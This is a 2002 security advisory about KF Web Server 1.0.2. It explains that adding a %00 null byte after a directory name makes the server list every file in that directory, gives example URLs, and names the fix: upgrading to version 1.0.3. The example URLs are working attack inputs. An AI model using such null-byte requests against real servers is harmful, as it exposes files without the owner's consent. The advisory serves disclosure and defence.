KF Web Server version 1.0.2 shows file and directory content
Overview
KF Web Server version 1.0.2 shows file and directory content
Discovered on 2002, July, 2nd
Vendor: KeyFocus
KF Web Server 1.0.2 is a free personal web server available for Windows 98,ME,2000,XP. This web server can shows file and directory content.
Risk
| Exploit easiness |  |
| Vulnerability spreading |  |
| Impact | |
| Risk | |
Details
If the requested URL contains a %00 after a directory name, then the server shows all files in the directory content. A hacker can see all hidden (non-HTML linked) files and directories on the server.
Exploit
The exploit is really easy. You can do it with any browser
Examples :
http://server_name/index.html : Normal use.
http://server_name/%00 : You get the vulnerability.
http://server_name/index.html%00 : Is *not* vulnerable.
http://server_name/%00index.html : You get the vulnerability. In fact everything after %00 is ignored.
http://server_name/subdir/%00 : You get the vulnerability.
You will get this page :
Solution
The vendor has been informed and has solved the problem.
Upgrade to KF Web Server version 1.0.3
Discovered by
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
Tags
Inscription à notre lettre d'information
Inscrivez-vous à notre lettre d'information pour vous tenir au courant de nos actualités et de nos dernières trouvailles.
© 2000-2026 - Tous droits réservés SecuriteInfo.com